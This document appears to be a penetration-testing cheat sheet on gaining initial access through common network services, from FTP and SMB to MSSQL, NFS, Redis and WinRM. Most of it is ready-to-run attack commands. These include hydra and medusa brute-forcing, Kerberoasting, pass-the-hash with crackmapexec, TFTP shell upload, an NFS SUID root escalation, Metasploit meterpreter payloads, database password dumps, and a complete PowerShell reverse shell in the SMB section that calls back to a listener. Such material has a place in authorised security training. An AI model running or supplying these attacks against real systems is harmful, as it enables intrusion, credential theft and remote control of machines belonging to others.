After finding your target and enumerating it, its now time for your initial access. This step is usually focused around exploiting a port/service open to you. There are tons of different ways to do this as you can see with the guides and list below.
Keep in mind that just because you cannot completely exploit one service does not mean it wont be helpful. Certain services may have interesting intel that might help you exploit something else, such as an open FTP server with anonymous auth, that contains a few docs with valid usernames in it (you will find worse things).
Once you have your initial exploitation, you will essentially attempt a second round of it to escalate your privileges in the target box. Some times that can be done by getting initial access on another trusted box, or even by a service that is running internally on the loopback. Check everything, look everywhere, and dont forget the OSCP catch phrase, "try harder!"
{% tabs %} {% tab title="General" %}
- https://book.hacktricks.xyz/
- https://guif.re/networkpentest
- https://xapax.github.io/security/#attacking_internal_network/list_of_common_ports/
- https://pentestbook.six2dez.com/enumeration/ports
- https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers {% endtab %}
{% tab title="Linux" %}
- Operator Handbook: Linux_Exploit pg. 127 {% endtab %}
{% tab title="MacOS" %}
- https://github.com/its-a-feature/offensive_macos
- https://github.com/its-a-feature/bifrost
- Operator Handbook: MacOS_Exploit pg. 173 {% endtab %}
{% tab title="Windows" %}
- __https://github.com/alphaSeclab/windows-security/blob/master/Readme_en.md
- Operator Handbook: Windows_Exploi {% endtab %} {% endtabs %}
{% tabs %} {% tab title="Use" %}
ftp> get [target file]
{% endtab %}
{% tab title="Anonymous Access" %}
# ftp [target]
- Username: anonymous
- Password: anything$ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip {% endtab %}
{% tab title="Enumeration" %}
$ nmap --script=ftp-* -p 21 $ip
$ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
{% endtab %}
{% tab title="Brute Force" %} Hydra
-
$ hydra -l user -P /usr/share/john/password.lst ftp://$ip:21
Metasploit
-
$ msfconsole -q msf> search type:auxiliary login msf> use auxiliary/scanner/ftp/ftp_login
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Brute Force" %}
# medusa -M ssh -C /usr/share/wordlists/ssh.lst -H 22.txt -T 10| grep SUCCESS |tee medusa-results.txt
# medusa -h -u -P /path/to/wordlist -M [telnet|ssh]
# hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV 10.10.47.138 ssh
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Telnet Brute" %}
# medusa -M telnet -C /usr/share/wordlists/telnet.lst -H 23.txt -T 10 -t 3| grep SUCCESS |tee medusa-results.txt
# medua -h <tehost.ip> -u <account.name> -P /path/to/wordlist -M [telnet|ssh]
{% endtab %}
{% tab title="Cisco Auditing Tool" %}
Perl script which scans cisco routers for common vulnerabilities.
# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Cmd Cheatsheet" %}
HELO -
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
>VRFY root
>EXPN root
{% endtab %}
{% tab title="User enum" %} https://www.kali.org/tools/smtp-user-enum/
# smtp-user-enum -M VRFY -U users.txt -t [ip]
MSF auxiliary/scanner/smtp/smtp_enum
#use auxiliary/scanner/smtp/smtp_enum
{% endtab %}
{% tab title="NMAP Enum" %}
$ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
{% endtab %}
{% tab title="Brute Force" %}
$ hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
{% endtab %}
{% tab title="Open Relay Check" %}
telnet $ip 25
EHLO root
MAIL FROM:[email protected]
RCPT TO:[email protected]
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT
{% endtab %}
{% tab title="SWAKS" %}
swaks (Swiss Army Knife SMTP) is a command-line tool written in Perl for testing SMTP setups; it supports STARTTLS and SMTP AUTH (PLAIN, LOGIN, CRAM-MD5, SPA, and DIGEST-MD5). swaks allows one to stop the SMTP dialog at any stage, e.g to check RCPT TO: without actually sending a mail. {% endtab %} {% endtabs %}
Point-to-Point Tunneling Protocol provides remote access to mobile devices, uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers.
{% tabs %} {% tab title="Enumeration" %}
-
$ nmap –Pn -sSV -p1723 $ip
{% endtab %}
{% tab title="Brute Force" %}
-
$ cat dic.txt | thc-pptp-brute
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Enum Tools" %}
# dnsrecon -d [domain] -t axfr
# dnsenum [domain]
{% endtab %}
{% tab title="Cache Snooping" %} DNS Cache Snooping - You can use the simple 'dig' command to explore what is saved in the target DNS Cache. Make sure you make these requests non-recursively so you do not contaminate the current cache.
- Hacking: The next generation - DNS Cache Snooping, pg. 86
#dig @targeterver.example.com testdomain.com A +norecurse
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Enumeration" %}
tftp [target] PUT local_file
tftp [target] GET example.txt
{% endtab %}
{% tab title="Shell Upload" %} If unauthenticated access is allowed with write permissions, you can upload a shell:
$ tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="User enumeration" %}
#finger [email protected]
$ finger-user-enum.pl -U users.txt -t $ip
{% endtab %}
{% tab title="Command Execution" %}
#finger “/bin/ls -a /@domain.com”
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="SSL/TLS" %} Open a connection
-
$ openssl s_client -connect $ip:443
Basic SSL ciphers check
-
$ nmap --script ssl-enum-ciphers -p 443 $ip
Look for unsafe ciphers such as Triple-DES and Blowfish
Very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc... {% endtab %} {% endtabs %}
{% content-ref url="../../web-app-hacking/" %} web-app-hacking {% endcontent-ref %}
Tools and Guides
{% tabs %} {% tab title="User Enum" %}
$ nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip
{% endtab %}
{% tab title="ASREPRoast" %}
ASREPRoast:
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
Conda's AS-REP Roasting Video {% endtab %}
{% tab title="Kerberoast" %} Check for Kerberoast
GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john
Kerberoast Attack
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
{% endtab %}
{% tab title="OverPTH" %}
python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python3 getTGT.py <domain_name>/<user_name>:[password]
{% endtab %}
{% tab title="Cmds w/ TGT" %}
python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
{% endtab %} {% endtabs %}
{% content-ref url="active-directory.md" %} active-directory.md {% endcontent-ref %}
Just telnet it.
{% tabs %} {% tab title="Enumeration" %} Nmap scripts
# nmap -sV -p 111 --script=rpcinfo [target]
# nmap -p 111 --script nfs* [target]
Impacket tool RPCdump.py
# rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
{% endtab %}
{% tab title="Connect" %}
Null Connect
#rpcclient -U “” [target]
Mount discovered NFS directory
# sudo mount -o nlock [ip]:/dir ~/yourdir/
{% endtab %}
{% tab title="Post Connection Commands" %}
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
{% endtab %}
{% tab title="Resources" %}
- https://github.com/bradleyjkemp/grpc-tools
- https://blog.davidvassallo.me/2018/10/17/pentesting-grpc-protobuf-decoding-first-steps/
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind {% endtab %} {% endtabs %}
- ident-user-enum - A simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system.
#ntpdc -c monlist [target]
#ntpdc -c sysinfo [target]
#ntpq
{% tabs %} {% tab title="Enumeration" %} Enumerate, shows if any NFS mount exposed
-
$ rpcinfo -p $ip -
$ nmap $ip --script=msrpc-enum -
# Endpoint Mapper Service Discovery use auxiliary/scanner/dcerpc/endpoint_mapper #Hidden DCERPC Service Discovery use auxiliary/scanner/dcerpc/hidden # Remote Management Interface Discovery use auxiliary/scanner/dcerpc/management # DCERPC TCP Service Auditor use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor msf > use exploit/windows/dcerpc/ms03_026_dcom
{% endtab %}
{% tab title="Resources" %}
- https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py
- https://pentestbook.six2dez.com/enumeration/ports?q=port+135
- https://cheatsheet.haax.fr/network/services-enumeration/135_rpc/ {% endtab %} {% endtabs %}
{% tabs %} {% tab title="Enum" %}
nmblookup -A 10.11.1.111
NSE Enumeration
#nmap -p 135-139,445 -vv --script=smb-enum* 10.10.10.10
SMB Users & Shares Scan
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
https://github.com/cddmp/enum4linux-ng/
enum4linux -a 10.10.10.10
nbtscan
#nbtscan [target]
{% endtab %}
{% tab title="Get Version" %}
smbver.sh 10.11.1.111
Msfconsole;use scanner/smb/smb_version
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
smbclient -L \\\\10.11.1.111
{% endtab %}
{% tab title="Get Shares" %}
smbmap -H 10.11.1.111 -R
echo exit | smbclient -L \\\\10.11.1.111
smbclient \\\\10.11.1.111\\
smbclient -L //10.11.1.111 -N
nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111
smbclient -L \\\\10.11.1.111\\
# If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
smbclient -L //10.11.1.111/ --option='client min protocol=NT1'
{% endtab %}
{% tab title="137-Dump NBT Table" %}
$ nmap -Pn -sUC -p137 $ip
{% endtab %}
{% tab title="SMB NMAP Scan" %}
# locate *.nse | grep smb
# nmap -p 139,445 --script=smb-vuln* [target]
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Null connect" %}
smbmap -H 10.11.1.111
rpcclient -U "" 10.10.10.10
smbclient //10.11.1.111/IPC$ -N
#Exploit
enum4linux -a 10.11.1.111
enum4linux-ng.py 10.11.1.111 -A -C
/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111
{% endtab %}
{% tab title="SMBClient" %}
#smbclient //[ip]/[sharename] -U user, -p port
#smbclient //[ip]/[sharename] -U Anonymous [do not use a password]
Pull down files
/> mget *
{% endtab %}
{% tab title="SMB Brute force" %}
#medusa -h <host.ip> -u <account.name> -P /path/to/wordlist -M smbnt
{% endtab %}
{% tab title="SMBMap" %}
smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum
smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE
smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing
smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell
{% endtab %}
{% tab title="CrackMapExec" %}
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa
{% endtab %}
{% tab title="SMBeagle" %}
SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host, or both!? {% endtab %} {% endtabs %}
Impacket Scripts
- https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/
- psexec.py: PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom).
- smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.
- atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
- wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
- dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
- smbclient.py: A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It's an excellent example to see how to use impacket.smb in action.
- addcomputer.py: Allows to add a computer to a domain using LDAP or SAMR (SMB).
- getArch.py: This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.
- ifmap.py: This script will bind to the target's MGMT interface to get a list of interface IDs. It will used that list on top of another list of interface UUIDs seen in the wild trying to bind to each interface and reports whether the interface is listed and/or listening.
- lookupsid.py: A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
- netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them looping over the hosts found and keeping track of who logged in/out from remote servers
- opdump.py: This binds to the given hostname:port and MSRPC interface. Then, it tries to call each of the first 256 operation numbers in turn and reports the outcome of each call.
- reg.py: Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility.
- rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
- samrdump.py: An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
- services.py: This script can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change.
Metasploit
Version
msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run
MultiExploit
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
161 - SNMP - http://www.net-snmp.org/
Basic SNMP Info
- Default community strings
- public, private, cisco (cable-docsis, ILMI)
-
Windows NT MIB codes
- .1.3.6.1.2.1.1.5 Hostnames
- .1.3.6.1.4.1.77.1.4.2 Domain Name
- .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
- .1.3.6.1.4.1.77.1.2.27 Share Information
 (1) (1).png)
-
 (1).png)
 (1) (1).png)
 (1).png)
# apt-get install snmp-mibs-downloader download-mibs
# echo "" > /etc/snmp/snmp.con
{% tabs %} {% tab title="Enum" %} Brute force community string check, find SNMP services.
onesixtyone - onesixtyone is a simple SNMP scanner which sends SNMP requests for the sysDescr value asynchronously with user-adjustable sending times and then logs the responses which gives the description of the software running on the device.
# onesixtyone -c community.list -i hosts.list
$ snmpenum $ip public windows.txt
Enumerating the entire MIB tree
https://linux.die.net/man/1/snmpwalk
# snmpwalk -c [community string] -v1 -t 10 [target]
Enumerate Specific MIB Code
# snmpwalk -c [community string] -v1 [target] [MIB code]
Metasploit Aux scanner - snmp_enum
msf> use auxiliary/scanner/snmp/snmp_enum
msf> set RHOSTS [target]
{% endtab %}
{% tab title="BRAA" %}
BRAA - Mass SNMP Scanning
# braa [email protected]:.1.3.6.*
{% endtab %}
{% tab title="Com string Brute force" %}
msf5> use auxiliary/scanner/snmp/snmp_login
#onesixtyone -c [wordlist] [target]
# nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
{% endtab %}
{% tab title="SNMPv3" %} Enumeration
#nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
# apt-get install snmp snmp-mibs-downloader
# wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
- V3 wordlists - /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt {% endtab %}
{% tab title="Cisco Copy Router Cfg" %}
Cisco copy-router-config
Copies configuration files from Cisco devices running SNMP.
# copy-router-config.pl [Router IP] [TFTP Server IP] [Community String]
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Enumeration" %} https://sourceforge.net/projects/ldapminer/
#ldapminer -h [target] -d
{% endtab %}
{% tab title="Anonymous Access" %} LDAP Anonymous Access
ldapsearch -h 192.168.1.101 -p 389 -x -b "dc=mywebsite,dc=com"
{% endtab %}
{% tab title="Tools and Resources" %}
- https://xapax.github.io/security/#attacking_active_directory_domain/good_to_know/ldap_syntax/
- LDAPmonitor - Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration
- ldapdomaindump - Active Directory information dumper via LDAP
- HEKATOMB - Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them. {% endtab %} {% endtabs %}
{% tabs %} {% tab title="Enumeration" %}
{% tab title="Brute-force" %}
- ike-crack {% endtab %} {% endtabs %}
#apt install rsh-client
#rlogin -l root 10.11.1.111
{% tabs %} {% tab title="Enumeration" %}
rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
{% endtab %}
{% tab title="Brute force" %}
- rsh-grind
- https://mrleet.com/note/82 {% endtab %} {% endtabs %}
- https://help.fortinet.com/fos50hlp/54/Content/FortiOS/fortigate-ports-and-protocols-54/Images/FortiGate.png
- SSL VPN Leak
{% tabs %} {% tab title="Enum" %}
- SQLPing - SQL Server scanning tool that also checks for weak passwords using wordlists.
- SQLpoke- SQL Server scanning tool
>sqlpoke [Start IP] [End IP] [Port] [Command File]
- SQL Recon - performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise {% endtab %}
{% tab title="Brute Force" %}
#sqlbf -u hashes.txt -d dictionary.dic -r out.rep (dictionary Attack)
#sqlbf -u hashes.txt -c default.cm -r out.rep (Brute-Force attack
{% endtab %}
{% tab title="Metasploit" %} Enumerate MSSQL Servers on the network
-
msf > use auxiliary/scanner/mssql/mssql_ping $ nmap -sU --script=ms-sql-info $ip
Bruteforce MsSql
-
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
Gain shell using gathered credentials
-
msf > use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
Log in to a MsSql server:
# root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa
root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
{% endtab %}
{% tab title="Specialty Tools" %}
- mssqlinstance.py: Retrieves the MSSQL instances names from the target host.
- mssqlclient.py: An MSSQL client, supporting SQL and Windows Authentications (hashes too). It also supports TLS.
- PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server
- https://github.com/NetSPI/PowerUpSQL/wiki {% endtab %}
{% tab title="Resources" %}
- https://www.hackingarticles.in/mssql-for-pentester-extracting-juicy-information/
- https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-extended-stored-procedures/
- MSSQL for Pentester: Extracting Juicy Information
- MSSQL for Pentester: Command Execution with Extended Stored Procedures
- MSSQL for Pentester: Hashing
- MSSQL for Pentester: Stored Procedures Persistence
- MSSQL for Pentester: Abusing Linked Database
- MSSQL for Pentester: Abusing Trustworthy
- MSSQL for Pentester: Command Execution with External Scripts
- MSSQL for Pentester: Impersonate
- MSSQL for Pentester: Metasploit
- MSSQL for Pentester: Command Execution with CLR Assembly
- MSSQL for Pentester: Command Execution with Ole Automation
- MSSQL for Pentester: Discovery
- MSSQL for Pentester: Command Execution with xp_cmdshell
- MSSQL for Pentester: Nmap
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet.md
- https://github.com/N {% endtab %} {% endtabs %}
{% tabs %} {% tab title="Enumeration" %} oracsec - A simple utility that can be used to enumerate SID's and carry out a simple username and password check against all default known usernames and passwords.
Oscanner - an Oracle assessment framework developed in Java.
# apt-get install oscanner
# oscanner -s 192.168.1.200 -P 1521
#apt-get install tnscmd10g
#tnscmd10g version -h TARGET
Nmap
#nmap --script=oracle-tns-version
{% endtab %}
{% tab title="Brute Force" %} NMAP
# nmap --script=oracle-sid-brute
# nmap --script=oracle-brute
{% endtab %}
{% tab title="ODAT" %}
This package contains the ODAT (Oracle Database Attacking Tool), an open source penetration testing tool that tests the security of Oracle Databases remotely.
- https://github.com/quentinhardy/odat {% endtab %} {% endtabs %}
- thc-pptp-bruter - Brute force program against pptp vpn endpoints (tcp port 1723). Fully standalone. Supports latest MSChapV2 authentication. Tested against Windows and Cisco gateways. Exploits a weakness in Microsoft’s anti-brute force implementation which makes it possible to try 300 passwords the second.
- evil-ssdp - This tool responds to SSDP multicast discover requests, posing as a generic UPNP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network.
#CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt
Cisco Smart Install exploitation tool
sudo python siet.py -g -i 192.168.0.1
{% tabs %} {% tab title="Enumeration" %}
#showmount -e hostname/ip
#mount -t nfs [ip]:/directory_found /local_mount_point
{% endtab %}
{% tab title="Mounting" %}
#mkdir /tmp/mount
#sudo mount -t nfs [IP]:[share] /tmp/mount/ -nolock
{% endtab %}
{% tab title="Root Squashing Attack" %}
- Root squashing - check for creation of SUID files
- NFS Access ->
- Gain Low Privilege Shell ->
- Upload Bash Executable to the NFS share ->
#cp /bin/bash /tmp/mount/mount
#cd /tmp/mount/mount
#sudo chown root bash
#sudo chmod 777 bash
- Set SUID Permissions Through NFS Due To Misconfigured Root Squash ->
- Login through SSH ->
- Execute SUID Bit Bash Executable -> # ./bash -p
- ROOT ACCESS {% endtab %} {% endtabs %}
Default passwords:
https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
- PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server
{% tabs %} {% tab title="Connect" %}
#mysql -h [IP] -u [username] -p
{% endtab %}
{% tab title="Administration" %}
#mysqlshow
#mysqlbinlog
mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
mysql> use mysql
mysql> select user,password from user;
{% endtab %}
{% tab title="Priv Esc" %}
mysql>select user();
mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
{% endtab %}
{% tab title="Break Into Shell" %}
mysql> \! cat /etc/passwd
mysql> \! bash
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
{% endtab %}
{% tab title="Metasploit" %}
admin/mysql/mysql_sql
{% endtab %}
{% tab title="SQLsus" %}
sqlsus is an open source MySQL injection and takeover tool, written in perl. Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database(s), and much more… Whenever relevant, sqlsus will mimic a MySQL console output. {% endtab %} {% endtabs %}
{% tabs %} {% tab title="Resources" %}
- https://www.hackingarticles.in/remote-desktop-penetration-testing-port-3389/
- https://www.hackingarticles.in/wireshark-for-pentester-decrypting-rdp-traffic/
- PowerRemoteDesktop - Remote Desktop entirely coded in PowerShell.
- Operator Handbook: RDP Exploitation - pg. 360 {% endtab %}
{% tab title="Use" %}
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10
{% endtab %}
{% tab title="Brute Force" %}
# ncrack -u administrator -P 500-worst-passwords.txt -p 3389 [target]
{% endtab %} {% endtabs %}
#nmap -p 4786 -v 192.168.0.1 --script ./cisco-siet.nse
- SIET tool - https://github.com/Sab0tag3d/SIET
- SipVicious - SIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password.
psql -h 10.10.1.111 -U postgres -W
pg_dump --host=10.10.1.111 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump
https://pentestbook.six2dez.com/enumeration/webservices/elk
{% tabs %} {% tab title="Use" %}
vncviewer 192.168.1.1
{% endtab %}
{% tab title="NMAP" %}
nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Enumeration" %}
curl http://example.com:5984/
curl -X GET http://IP:5984/_all_dbs
curl -X GET http://user:password@IP:5984/_all_dbs
{% endtab %}
{% tab title="Create User" %}
curl -X PUT ‘http://localhost:5984/_users/org.couchdb.user:chenny' — data-binary ‘{ “type”: “user”, “name”: “chenny”, “roles”: [“_admin”], “roles”: [], “password”: “password” }’
{% endtab %}
{% tab title="Dump DB and Passwords" %}
curl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u chenny:-Xpassword <ds/_all_docs?include_docs=true -u chenny:-Xpassword
curl -X GET http://user:passwords@localhost:5984/passwords
{% endtab %} {% endtabs %}
- If 5985 is open. WinRM is running
- If 5986 is closed, then WinRM is only configed to accept HTTP connections and encryption is not enabled.
PS> Invoke-Command -ComputerName TARG ET -ScriptBlock { dir c:\ }
PS> EnablePSRemoting -Force
gem install evil-winrm
evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder
Enumerate:
-
$ nmap -p6379 --script redis-info $ip
Client:
-
$ redis-cli -h $ip
#python redis.py 10.10.10.160 redis
- pret - https://github.com/RUB-NDS/PRET
- Praeda - https://github.com/percx/Praeda
Enumerate:
-
$ nmap -p11211 --script memcached-info $ip
Extract data:
-
msf > use auxiliary/gather/memcached_extractor
.png)